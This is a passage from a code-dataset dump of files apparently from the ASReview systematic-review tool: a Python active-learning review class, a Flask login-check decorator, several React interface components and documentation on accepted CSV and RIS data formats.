"src_encoding": "UTF-8", "text": "import logging\nfrom abc import ABC\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom asreview.config import DEFAULT_N_INSTANCES\nfrom asreview.config import LABEL_NA\nfrom asreview.models.balance.simple import SimpleBalance\nfrom asreview.models.classifiers import NaiveBayesClassifier\nfrom asreview.models.feature_extraction.tfidf import Tfidf\nfrom asreview.models.query.max import MaxQuery\nfrom asreview.project import open_state\nfrom asreview.settings import ASReviewSettings\n\n\nclass BaseReview(ABC):\n \"\"\"Base class for Systematic Review.\n\n Arguments\n ---------\n as_data: asreview.ASReviewData\n The data object which contains the text, labels, etc.\n project: path-like\n Path to the project file.\n model: BaseTrainClassifier\n Initialized model to fit the data during active learning.\n See asreview.models.utils.py for possible models.\n query_model: BaseQueryStrategy\n Initialized model to query new instances for review, such as random\n sampling or max sampling.\n See asreview.query_strategies.utils.py for query models.\n balance_model: BaseBalance\n Initialized model to redistribute the training data during the\n active learning process. They might either resample or undersample\n specific papers.\n feature_model: BaseFeatureExtraction\n Feature extraction model that converts texts and keywords to\n feature matrices.\n n_instances: int\n Number of papers to query at each step in the active learning\n process.\n stop_if: int\n Number of steps/queries to perform. Set to None for no limit.\n start_idx: numpy.ndarray\n Start the simulation/review with these indices. They are assumed to\n be already labeled. Failing to do so might result bad behaviour.\n \"\"\"\n\n def __init__(\n self,\n as_data,\n project,\n model=NaiveBayesClassifier(),\n query_model=MaxQuery(),\n balance_model=SimpleBalance(),\n feature_model=Tfidf(),\n n_papers=None,\n n_instances=DEFAULT_N_INSTANCES,\n stop_if=None,\n start_idx=[],\n ):\n \"\"\"Initialize the reviewer base class, so that everything is ready to\n train a new model.\"\"\"\n super(BaseReview, self).__init__()\n\n # Set the model.\n self.classifier = model\n self.balance_model = balance_model\n self.query_strategy = query_model\n self.feature_extraction = feature_model\n\n # Set the settings.\n self.as_data = as_data\n self.project = project\n self.n_instances = n_instances\n self.stop_if = stop_if\n self.prior_indices = start_idx\n\n if n_papers is not None:\n logging.warning(\"Argument n_papers is deprecated, ignoring n_papers.\")\n\n # Get the known labels.\n self.data_labels = as_data.labels\n if self.data_labels is None:\n self.data_labels = np.full(len(as_data), LABEL_NA)\n\n with open_state(self.project, read_only=False) as state:\n # If the state is empty, add the settings.\n if state.is_empty():\n state.settings = self.settings\n\n # Add the record table to the state if it is not already there.\n self.record_table = state.get_record_table()\n if self.record_table.empty:\n state.add_record_table(as_data.record_ids)\n self.record_table = state.get_record_table()\n\n # Retrieve feature matrix from the project file or create\n # one from scratch.\n try:\n self.X = self.project.get_feature_matrix(self.feature_extraction.name)\n except FileNotFoundError:\n self.X = self.feature_extraction.fit_transform(\n as_data.texts, as_data.headings, as_data.bodies, as_data.keywords\n )\n\n # check if the number of records after the transform equals\n # the number of records in the dataset\n if self.X.shape[0] != len(as_data):\n raise ValueError(\n \"Dataset has {} records while feature \"\n \"extractor returns {} records\".format(\n len(as_data), self.X.shape[0]\n )\n )\n\n self.project.add_feature_matrix(self.X, self.feature_extraction.name)\n\n # Check if the number or records in the feature matrix matches the\n # length of the dataset.\n if self.X.shape[0] != len(self.data_labels):\n raise ValueError(\n \"The state file does not correspond to the \"\n \"given data file, please use another state \"\n \"file or dataset.\"\n )\n\n # Make sure the priors are labeled.\n self._label_priors()\n\n @property\n def settings(self):\n \"\"\"Get an ASReview settings object\"\"\"\n extra_kwargs = {}\n if hasattr(self, \"n_prior_included\"):\n extra_kwargs[\"n_prior_included\"] = self.n_prior_included\n if hasattr(self, \"n_prior_excluded\"):\n extra_kwargs[\"n_prior_excluded\"] = self.n_prior_excluded\n return ASReviewSettings(\n model=self.classifier.name,\n query_strategy=self.query_strategy.name,\n balance_strategy=self.balance_model.name,\n feature_extraction=self.feature_extraction.name,\n n_instances=self.n_instances,\n stop_if=self.stop_if,\n model_param=self.classifier.param,\n query_param=self.query_strategy.param,\n balance_param=self.balance_model.param,\n feature_param=self.feature_extraction.param,\n **extra_kwargs\n )\n\n def review(self):\n \"\"\"Do a full review.\"\"\"\n # Label any pending records.\n\n with open_state(self.project, read_only=False) as s:\n pending = s.get_pending()\n if not pending.empty:\n self._label(pending)\n\n labels_prior = s.get_labels()\n\n # progress bars\n pbar_rel = tqdm(\n initial=sum(labels_prior),\n total=sum(self.as_data.labels),\n desc=\"Relevant records found\",\n )\n pbar_total = tqdm(\n initial=len(labels_prior),\n total=len(self.as_data),\n desc=\"Records labeled \",\n )\n\n # While the stopping condition has not been met:\n while not self._stop_review():\n # Train a new model.\n self.train()\n\n # Query for new records to label.\n record_ids = self._query(self.n_instances)\n\n # Label the records.\n labels = self._label(record_ids)\n\n # monitor progress here\n pbar_rel.update(sum(labels))\n pbar_total.update(len(labels))\n\n else:\n # write to state when stopped\n pbar_rel.close()\n pbar_total.close()\n self._write_to_state()\n\n def _label_priors(self):\n \"\"\"Make sure the prior records are labeled.\"\"\"\n with open_state(self.project, read_only=False) as state:\n labeled = state.get_labeled()\n unlabeled_priors = [\n x for x in self.prior_indices if x not in labeled[\"record_id\"].to_list()\n ]\n self._label(unlabeled_priors, prior=True)\n\n def _stop_review(self):\n \"\"\"Check if the review should be stopped according to stopping rule\n obtained from the settings.\n\n Returns\n -------\n bool\n If True, the stopping criteria have been met.\n \"\"\"\n stop = False\n\n # Get the pool and labeled. There never should be pending papers here.\n with open_state(self.project) as state:\n pool, labeled, _ = state.get_pool_labeled_pending()\n\n # if the pool is empty, always stop\n if pool.empty:\n stop = True\n\n # If stop_if is set to min, stop when all papers in the pool are\n # irrelevant.\n if self.stop_if == \"min\" and (self.data_labels[pool] == 0).all():\n stop = True\n # Otherwise, stop when reaching stop_if (if provided)\n elif self.stop_if is not None:\n with open_state(self.project) as state:\n training_sets = state.get_training_sets()\n # There is one query per trained model. We subtract 1\n # for the priors.\n stop_if = len(set(training_sets)) - 1\n if stop_if >= self.stop_if:\n stop = True\n\n return stop\n\n def _query(self, n):\n \"\"\"Query new records to label.\n\n Arguments\n ---------\n n: int\n Number of records to query.\n\n Returns\n -------\n list\n List of record_ids of the n top ranked records according to the last\n ranking saved in the state.\n \"\"\"\n with open_state(self.project, read_only=False) as s:\n top_n_records = s.query_top_ranked(n)\n return top_n_records\n\n def _label(self, record_ids, prior=False):\n \"\"\"Label queried records uses the known labels in a simulated review.\n\n Arguments\n ---------\n record_ids: list\n List of record_ids that will be labeled.\n prior: bool\n Whether the records priors or not.\n \"\"\"\n labels = self.data_labels[record_ids]\n\n with open_state(self.project, read_only=False) as s:\n s.add_labeling_data(record_ids, labels, prior=prior)\n\n def train(self):\n \"\"\"Train a new model on the labeled data.\"\"\"\n # Check if both labels are available.\n with open_state(self.project) as state:\n labeled = state.get_labeled()\n labels = labeled[\"label\"].to_list()\n training_set = len(labeled)\n if not (0 in labels and 1 in labels):\n raise ValueError(\n \"Not both labels available. \" \"Stopped training the model\"\n )\n\n # TODO: Simplify balance model input.\n # Use the balance model to sample the trainings data.\n y_sample_input = (\n pd.DataFrame(self.record_table)\n .merge(labeled, how=\"left\", on=\"record_id\")\n .loc[:, \"label\"]\n .fillna(LABEL_NA)\n .to_numpy()\n )\n train_idx = np.where(y_sample_input != LABEL_NA)[0]\n\n X_train, y_train = self.balance_model.sample(self.X, y_sample_input, train_idx)\n\n # Fit the classifier on the trainings data.\n self.classifier.fit(X_train, y_train)\n\n # Use the query strategy to produce a ranking.\n ranked_record_ids = self.query_strategy.query(\n self.X, classifier=self.classifier\n )\n\n # TODO: Also log the probablities.\n # Log the ranking in the state.\n with open_state(self.project, read_only=False) as state:\n state.add_last_ranking(\n ranked_record_ids,\n self.classifier.name,\n self.query_strategy.name,\n self.balance_model.name,\n self.feature_extraction.name,\n training_set,\n )\n" }, { "alpha_fraction": 0.6646207571029663, "alphanum_fraction": 0.6738272905349731, "avg_line_length": 33.56060791015625, "blob_id": "d9181cd48bd2bde58150a51c8a6af6e2e28f81cb", "content_id": "fb33cba98461751cc9253c013ab9fd664d053449", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2281, "license_type": "permissive", "max_line_length": 74, "num_lines": 66, "path": "/asreview/webapp/authentication/login_required.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom functools import wraps\n\nfrom flask import current_app\nfrom flask import jsonify\nfrom flask import request\nfrom flask_login import current_user\nfrom flask_login.config import EXEMPT_METHODS\n\nfrom asreview.webapp.authentication.models import Project\n\n\ndef asreview_login_required(func):\n @wraps(func)\n def decorated_view(*args, **kwargs):\n if not current_app.config.get(\"AUTHENTICATION_ENABLED\"):\n pass\n elif request.method in EXEMPT_METHODS:\n pass\n else:\n if not (bool(current_user) and current_user.is_authenticated):\n return jsonify({\"message\": \"Login required.\"}), 401\n\n return func(*args, **kwargs)\n\n return decorated_view\n\n\ndef project_authorization(f):\n \"\"\"Decorator function that checks if current user can access\n a project in an authenticated situation\"\"\"\n\n @wraps(f)\n def decorated_function(project_id, *args, **kwargs):\n if app_is_authenticated(current_app):\n # find the project\n project = Project.query.filter(\n Project.project_id == project_id\n ).one_or_none()\n if project is None:\n return jsonify({\"message\": \"project not found\"}), 404\n # if there is a project, check if\n all_users = set([project.owner] + project.collaborators)\n if current_user not in all_users:\n return jsonify({\"message\": \"no permission\"}), 403\n return f(project_id, *args, **kwargs)\n\n return decorated_function\n\n\ndef app_is_authenticated(app):\n \"\"\"Checks is app is authenticated\"\"\"\n return app.config.get(\"AUTHENTICATION_ENABLED\", False)\n" }, { "alpha_fraction": 0.5339158177375793, "alphanum_fraction": 0.5366163849830627, "avg_line_length": 31.448453903198242, "blob_id": "e8aaa0b6aa9a1f984109b4a514ac50385c9a7558", "content_id": "95317bed4ec86587012139536ec93f407942b082", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 6295, "license_type": "permissive", "max_line_length": 108, "num_lines": 194, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/InvitationComponent.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery } from \"react-query\";\nimport { useParams } from \"react-router-dom\";\nimport { TeamAPI } from \"../../api/index.js\";\nimport List from \"@mui/material/List\";\nimport { Add } from \"@mui/icons-material\";\nimport TextField from \"@mui/material/TextField\";\nimport Autocomplete from \"@mui/material/Autocomplete\";\nimport UserListEntry from \"./UserListEntry\";\nimport { Box, Fab, Stack } from \"@mui/material\";\nimport { ConfirmationDialog } from \".\";\n\nconst InvitationContents = (props) => {\n const [selectedUser, setSelectedUser] = React.useState(null);\n const [removeUser, setRemoveUser] = React.useState(null);\n const [inputValue, setInputValue] = React.useState(\"\");\n const [collaborators, setCollaborators] = React.useState(new Set([]));\n const [invitedUsers, setInvitedUsers] = React.useState(new Set([]));\n const [allUsers, setAllUsers] = React.useState([]);\n const [associatedUsers, setAssociatedUsers] = React.useState(new Set([]));\n const { project_id } = useParams();\n const [dialogOpen, setDialogOpen] = React.useState(false);\n\n const handleOpenConfirmationDialog = (user) => {\n setRemoveUser(user);\n setDialogOpen(true);\n };\n\n const handleCloseConfirmationDialog = () => {\n setDialogOpen(false);\n };\n\n useQuery(\n [\"fetchCollaborators\", project_id],\n () => TeamAPI.fetchCollaborators(project_id),\n {\n onSuccess: (data) => {\n setAllUsers(data.all_users || []);\n setCollaborators(new Set(data.collaborators || []));\n setInvitedUsers(new Set(data.invitations || []));\n },\n onError: (data) => {\n console.log(\"error\", data);\n },\n },\n );\n\n React.useEffect(() => {\n setAssociatedUsers((state) => new Set([...collaborators, ...invitedUsers]));\n }, [collaborators, invitedUsers]);\n\n const inviteUser = () => {\n if (selectedUser) {\n TeamAPI.inviteUser(project_id, selectedUser.id)\n .then((data) => {\n if (data.success) {\n // add this user to the invited users (ofEffect will take care of the rest\n // -autocomplete-)\n setInvitedUsers((state) => new Set([...state, selectedUser.id]));\n // set selected value to null\n setSelectedUser(null);\n } else {\n console.log(\"Could not invite user -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not invite user\", err));\n }\n };\n\n const removeInvitation = (id) => {\n TeamAPI.deleteInvitation(project_id, id)\n .then((data) => {\n if (data.success) {\n // remove from the invited users list, useEffect will take care of the rest\n // for the autocomplete\n setInvitedUsers((state) => {\n state.delete(id);\n return new Set([...state]);\n });\n } else {\n console.log(\"Could not delete invitation -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not delete invitation\", err));\n };\n\n const removeCollaborator = () => {\n if (removeUser) {\n // close the confirmation dialog if open\n if (dialogOpen) {\n setDialogOpen(false);\n }\n // remove from backend\n TeamAPI.endCollaboration(project_id, removeUser.id)\n .then((data) => {\n if (data.success) {\n // remove from the collabo users list, useEffect will take care of the rest\n // for the autocomplete\n setCollaborators((state) => {\n state.delete(removeUser.id);\n return new Set([...state]);\n });\n } else {\n console.log(\"Could not delete invitation -- DB failure\");\n }\n })\n .catch((err) => console.log(\"Could not delete invitation\", err));\n }\n };\n\n return (\n <>\n <Box>\n <Box>\n <h2>Invite</h2>\n <Autocomplete\n value={selectedUser}\n isOptionEqualToValue={(option, value) => option.id === value.id}\n onChange={(event, newValue = null) => {\n if (newValue !== null) {\n setSelectedUser(newValue);\n }\n }}\n inputValue={inputValue}\n onInputChange={(event, newInputValue) => {\n setInputValue(newInputValue);\n }}\n id=\"controllable-states-demo\"\n options={allUsers.filter((item) => !associatedUsers.has(item.id))}\n getOptionLabel={(option) => `${option.name}`}\n sx={{ width: 300, padding: 1 }}\n renderInput={(params) => (\n <TextField {...params} label=\"Select a user\" />\n )}\n />\n <Fab\n className=\"\"\n color=\"primary\"\n onClick={inviteUser}\n variant=\"extended\"\n sx={{ width: 120, padding: 1, margin: 2 }}\n >\n <Add sx={{ mr: 1 }} />\n Invite\n </Fab>\n </Box>\n\n <Box>\n <h2>Pending (dbl click to remove)</h2>\n <List component={Stack} direction=\"row\">\n {allUsers\n .filter((item) => invitedUsers.has(item.id))\n .map((user) => (\n <UserListEntry\n key={user.id}\n user={user}\n onDoubleClick={removeInvitation}\n />\n ))}\n </List>\n </Box>\n\n <Box>\n <h2>Collaborators (dbl click to remove)</h2>\n <List sx={{ pt: 0 }}>\n {allUsers\n .filter((item) => collaborators.has(item.id))\n .map((user) => (\n <UserListEntry\n key={user.id}\n user={user}\n onDoubleClick={handleOpenConfirmationDialog}\n />\n ))}\n </List>\n </Box>\n </Box>\n\n <ConfirmationDialog\n open={dialogOpen}\n title={`Remove \"${\n removeUser && Boolean(removeUser.name) ? removeUser.name : \"unknown\"\n }\" from project`}\n contents={\n \"Are you sure? You will remove this person from this project if you click on the 'Remove' button.\"\n }\n handleCancel={handleCloseConfirmationDialog}\n handleConfirm={removeCollaborator}\n />\n </>\n );\n};\n\nexport default InvitationContents;\n" }, { "alpha_fraction": 0.5036057829856873, "alphanum_fraction": 0.5132211446762085, "avg_line_length": 26.733333587646484, "blob_id": "b6bd964b060ea2b584493f917ca93dee34446bb5", "content_id": "5a23b116f9671c445c534fd740ba0bc24daf263b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4992, "license_type": "permissive", "max_line_length": 89, "num_lines": 180, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/DataComponents/PriorSearch.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQuery, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport {\n Box,\n CircularProgress,\n Divider,\n Fade,\n InputBase,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { ArrowBack, Search } from \"@mui/icons-material\";\n\nimport { InfoCard } from \"../../SetupComponents\";\nimport { InlineErrorHandler } from \"../../../Components\";\nimport { PriorUnlabeled } from \"../DataComponents\";\nimport { StyledIconButton } from \"../../../StyledComponents/StyledButton\";\nimport { ProjectAPI } from \"../../../api/index.js\";\nimport { mapStateToProps } from \"../../../globals.js\";\nimport { useToggle } from \"../../../hooks/useToggle\";\n\nconst PREFIX = \"PriorSearch\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n recordCard: `${PREFIX}-record-card`,\n infoCard: `${PREFIX}-info-card`,\n empty: `${PREFIX}-empty`,\n loading: `${PREFIX}-loading`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n height: \"100%\",\n [`& .${classes.root}`]: {\n height: \"100%\",\n },\n\n [`& .${classes.recordCard}`]: {\n alignItems: \"center\",\n height: \"calc(100vh - 208px)\",\n width: \"100%\",\n overflowY: \"scroll\",\n padding: \"32px 24px\",\n [theme.breakpoints.down(\"md\")]: {\n height: \"calc(100% - 56px)\",\n },\n },\n\n [`& .${classes.infoCard}`]: {\n width: \"100%\",\n maxWidth: \"400px\",\n },\n\n [`& .${classes.empty}`]: {\n height: \"calc(100% - 56px)\",\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n\n [`& .${classes.loading}`]: {\n height: \"calc(100% - 56px)\",\n display: \"flex\",\n alignItems: \"center\",\n justifyContent: \"center\",\n },\n}));\n\nconst PriorSearch = (props) => {\n const queryClient = useQueryClient();\n const [keyword, setKeyword] = React.useState(\"\");\n const [clickSearch, onClickSearch] = useToggle();\n\n const { data, error, isError, isFetched, isFetching, isSuccess } = useQuery(\n [\"fetchPriorSearch\", { project_id: props.project_id, keyword: keyword }],\n ProjectAPI.fetchPriorSearch,\n {\n enabled: clickSearch,\n onSuccess: () => {\n if (clickSearch) {\n onClickSearch();\n }\n },\n refetchOnWindowFocus: false,\n },\n );\n\n const refetchPriorSearch = () => {\n queryClient.resetQueries(\"fetchPriorSearch\");\n };\n\n const onChangeKeyword = (event) => {\n setKeyword(event.target.value);\n };\n\n const onKeyDown = (event) => {\n if (event.key === \"Enter\") {\n onClickSearch();\n }\n };\n\n return (\n <Root>\n <Fade in>\n <Box className={classes.root}>\n <Stack direction=\"row\" sx={{ p: \"4px 16px\" }}>\n <Tooltip title=\"Select another way\">\n <StyledIconButton onClick={props.toggleSearch}>\n <ArrowBack />\n </StyledIconButton>\n </Tooltip>\n <InputBase\n autoFocus\n fullWidth\n onChange={onChangeKeyword}\n onKeyDown={onKeyDown}\n placeholder=\"Search\"\n sx={{ ml: 1 }}\n />\n <StyledIconButton onClick={onClickSearch}>\n <Search />\n </StyledIconButton>\n </Stack>\n <Divider />\n {isFetching && !isError && (\n <Box className={classes.loading}>\n <CircularProgress />\n </Box>\n )}\n {!isFetching && isError && (\n <Box className={classes.empty}>\n <InlineErrorHandler\n message={error[\"message\"]}\n refetch={refetchPriorSearch}\n button={true}\n />\n </Box>\n )}\n {!isFetching &&\n !isError &&\n (data === undefined ||\n !data?.result.filter((record) => record?.included === -1)\n .length) && (\n <Box className={classes.empty}>\n <Typography variant=\"body2\" sx={{ color: \"text.secondary\" }}>\n Your search results will show up here\n </Typography>\n </Box>\n )}\n {!isError && isFetched && isSuccess && (\n <Stack\n className={classes.recordCard}\n aria-label=\"unlabeled record card\"\n spacing={3}\n >\n <Box className={classes.infoCard}>\n <InfoCard info=\"Label records that you want to use as prior knowledge\" />\n </Box>\n {data?.result\n .filter((record) => record?.included === -1)\n .map((record, index) => (\n <PriorUnlabeled\n keyword={keyword}\n record={record}\n n_prior={props.n_prior}\n key={`result-page-${index}`}\n />\n ))}\n </Stack>\n )}\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(PriorSearch);\n" }, { "alpha_fraction": 0.6604584455490112, "alphanum_fraction": 0.6604584455490112, "avg_line_length": 23.068965911865234, "blob_id": "26a9239f7898e5a1270b3d928f4652b18e239143", "content_id": "063fc88b014ef58ded7ec5749f4b53b7d6922d90", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 698, "license_type": "permissive", "max_line_length": 69, "num_lines": 29, "path": "/asreview/webapp/src/Components/DialogErrorHandler.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useQueryClient } from \"react-query\";\nimport {\n Button,\n Dialog,\n DialogActions,\n DialogContent,\n DialogContentText,\n} from \"@mui/material\";\n\nexport default function DialogErrorHandler(props) {\n const queryClient = useQueryClient();\n const resetQuery = () => {\n queryClient.resetQueries(props.queryKey);\n };\n\n return (\n <Dialog open={props.isError} onClose={resetQuery}>\n <DialogContent>\n <DialogContentText>{props.error?.message}</DialogContentText>\n </DialogContent>\n <DialogActions>\n <Button onClick={resetQuery} autoFocus>\n Try to Refresh\n </Button>\n </DialogActions>\n </Dialog>\n );\n}\n" }, { "alpha_fraction": 0.6344696879386902, "alphanum_fraction": 0.6344696879386902, "avg_line_length": 26.310344696044922, "blob_id": "f8efef52a10497e3d4afff4c99d3e87014fc1c57", "content_id": "72dfa71fea72271980e5829e8cf38e02b725aab3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1636, "license_type": "permissive", "max_line_length": 161, "num_lines": 58, "path": "/asreview/webapp/src/ProjectComponents/AnalyticsComponents/ShareFabAction.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport {\n EmailShareButton,\n FacebookShareButton,\n TwitterShareButton,\n WeiboShareButton,\n WhatsappShareButton,\n} from \"react-share\";\nimport { styled } from \"@mui/material/styles\";\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"none\",\n}));\n\nconst asreview_url = \"https://asreview.ai\";\nconst hashtag = \"SystematicReview\";\n\nexport default function ShareFabAction(props) {\n const n_papers = props.progressQueryData?.n_papers;\n const n_included = props.progressQueryData?.n_included;\n const n_labeled =\n props.progressQueryData?.n_included + props.progressQueryData?.n_excluded;\n\n const text_en = `I'm using ASReview LAB to systematically review ${n_papers} records and found ${n_included} relevant ones after only reviewing ${n_labeled}!`;\n const text_cn = `我在用ASReview LAB对${n_papers}篇文献做系统综述(systematic review)。筛选${n_labeled}篇之后,发现了${n_included}篇相关!`;\n\n return (\n <Root>\n <TwitterShareButton\n ref={props.twitterRef}\n url={asreview_url}\n title={text_en}\n via=\"asreviewlab\"\n hashtags={[hashtag]}\n />\n <FacebookShareButton\n ref={props.facebookRef}\n url={asreview_url}\n quote={text_en}\n />\n <WeiboShareButton\n ref={props.weiboRef}\n url={asreview_url}\n title={text_cn}\n />\n <WhatsappShareButton\n ref={props.whatsappRef}\n url={asreview_url}\n title={text_en}\n />\n <EmailShareButton\n ref={props.emailRef}\n url={asreview_url}\n body={text_en}\n />\n </Root>\n );\n}\n" }, { "alpha_fraction": 0.6265060305595398, "alphanum_fraction": 0.6361445784568787, "avg_line_length": 20.842105865478516, "blob_id": "dac0434f869c93829736d22b6813f88e28c8d7f2", "content_id": "261264055b57d59e6334ebe42496b11ff66c0668", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 415, "license_type": "permissive", "max_line_length": 51, "num_lines": 19, "path": "/asreview/webapp/src/Components/ActionsFeedbackBar.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Snackbar } from \"@mui/material\";\n\nexport default function ActionsFeedbackBar(props) {\n let anchorOrigin = {\n vertical: \"bottom\",\n horizontal: !props.center ? \"right\" : \"center\",\n };\n\n return (\n <Snackbar\n anchorOrigin={anchorOrigin}\n onClose={props.onClose}\n open={props.open}\n autoHideDuration={6000}\n message={props.feedback}\n />\n );\n}\n" }, { "alpha_fraction": 0.5376048684120178, "alphanum_fraction": 0.5400797724723816, "avg_line_length": 54.9461555480957, "blob_id": "693d49eeb337f77988292ffe23e3779b112a05c0", "content_id": "c0cd4d502921e16a72158b9defee85131d9b093e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 7273, "license_type": "permissive", "max_line_length": 143, "num_lines": 130, "path": "/docs/source/data_format.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Data format\n===========\n\nTo carry out a systematic review with ASReview on your own dataset, your data\nfile needs to adhere to a certain format. ASReview accepts the following\nformats:\n\n\nTabular file format\n-------------------\n\nTabular datasets with extensions ``.csv``, ``.tab``, ``.tsv``, or ``.xlsx``\ncan be used in ASReview LAB. CSV and TAB files are preferably comma,\nsemicolon, or tab-delimited. The preferred file encoding is *UTF-8* or\n*latin1*.\n\nFor tabular data files, the software accepts a set of predetermined column names:\n\n.. _column-names:\n\n.. table:: Table with column name definitions\n :widths: 20 60 20\n\n +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n | Name | Column names | Mandatory |\n +=============+=========================================================================================================+===========+\n | Title | title, primary_title | yes\\* |\n +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n | Abstract | abstract, abstract note | yes\\* |\n +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n | Keywords | keywords | no |\n +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n | Authors | authors, author names, first_authors | no |\n +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n | DOI | doi | no |\n +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n | URL | url | no |\n +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n | Included | final_included, label, label_included, included_label, included_final, included, included_flag, include | no |\n +-------------+---------------------------------------------------------------------------------------------------------+-----------+\n\n\n\\* Only a title or an abstract is mandatory.\n\n**Title, Abstract** Each record (i.e., entry in the dataset) should hold\nmetadata on a paper. Mandatory metadata are only ``title`` or ``abstract``. If\nboth title and abstract are available, the text is combined and used for\ntraining the model. If the column ``title`` is empty, the software will search\nfor the next column ``primary_title`` and the same holds for ``abstract`` and\n``abstract_note``.\n\n**Keywords, Authors** If ``keywords`` and/or ``author`` (or if the column is\nempty: ``author names`` or ``first_authors``) are available it can be used for\nsearching prior knowledge. Note the information is not shown during the\nscreening phase and is also not used for training the model, but the\ninformation is available via the API.\n\n**DOI and URL**\nIf a Digital Object Identifier ( ``DOI``) is available it will be displayed during the\nscreening phase as a clickable hyperlink to the full text document. Similary, if a URL\nis provided, this is also displayed as a clickable link. Note by\nusing ASReview you do *not* automatically have access to full-text and if you do\nnot have access you might want to read this `blog post <https://asreview.ai/blog/tools-that-work-well-with-asreview-google-scholar-button/>`__.\n\n**Included** A binary variable indicating the existing labeling decisions with\n``0`` = irrelevant/excluded, and ``1`` = relevant/included. Different column\nnames are allowed, see the table. It can be used for:\n\n- **Screening**: In ASReview LAB, if labels are available for a part of the\n dataset (see :doc:`data_labeled`), the\n labels will be automatically detected and used for prior knowledge. The first\n iteration of the model will then be based on these decisions and used to\n predict relevance scores for the unlabeled part of the data.\n- **Exploration**: You can explore a completely labeled dataset in the Exploration\n Mode. The relevant/irrelevant label in the dataset will be displayed on each record.\n This option is useful for training purposes, presentations, and workshops.\n- **Simulation**: In a :doc:`Simulation<simulation_overview/>`,\n the column containing the labels is used to simulate a systematic review run.\n Only records containing labels are used for the simulation, unlabeled records are ignored.\n\n.. note::\n\n Files exported with ASReview LAB contain the column ``included``. When\n re-importing a partly labeled dataset in RIS file format, the labels\n stored in the N1 field are used as prior knowledge. When a completely\n labeled dataset is re-imported it can be used in the Exploration and\n Simulation mode. \n\n\nRIS file format\n---------------\n\nRIS file formats (with extensions ``.ris`` or ``.txt``) are used by digital\nlibraries, like IEEE Xplore, Scopus and ScienceDirect. Citation managers\nMendeley, RefWorks, Zotero, and EndNote support the RIS file format as well.\nSee `(wikipedia) <https://en.wikipedia.org/wiki/RIS_(file_format)>`__ for \ndetailed information about the format. \n\nFor parsing RIS file format, ASReview LAB uses a Python RIS files parser and\nreader (`rispy <https://pypi.org/project/rispy/>`__). Successful import/export\ndepends on a proper data set structure. The complete list of accepted fields and \ndefault mapping can be found on the `rispy GitHub page <https://github.com/MrTango/rispy>`_.\n\n\n.. tip:: \n\n The labels ``ASReview_relevant``, ``ASReview_irrelevant``, and\n ``ASReview_not_seen`` are stored with the N1 (Notes) tag. In citation managers\n Zotero and Endnote the labels can be used for making selections; see the\n screenshots or watch the `instruction video <https://www.youtube.be/-Rw291AE20I>`_. \n\n.. note:: \n\n When re-importing a partly labeled dataset in the the RIS file format, the\n labels stored in the N1 field are used as prior knowledge. When a completely\n labeled dataset is re-imported it can be used in the Exploration and\n Simulation mode. \n\n\n\n.. figure:: ../images/asreview_export_to_zotero_labeled.png\n :alt: Example record with a labeling decision imported to Zotero\n\n Example record with a labeling decision imported to Zotero\n\n\n.. figure:: ../images/asreview_export_to_endnote_labeled.png\n :alt: Example record with a labeling decision imported to Endnote\n \n Example record with a labeling decision imported to Endnote\n" }, { "alpha_fraction": 0.740362823009491, "alphanum_fraction": 0.7471655607223511, "avg_line_length": 41, "blob_id": "1cae03ee6acd8e8098420eb3dffeaa43282e589f", "content_id": "d551afb0c90b463b3a01b4d0e18fe72cb49810df", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 882, "license_type": "permissive", "max_line_length": 83, "num_lines": 21, "path": "/docs/source/cli.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": 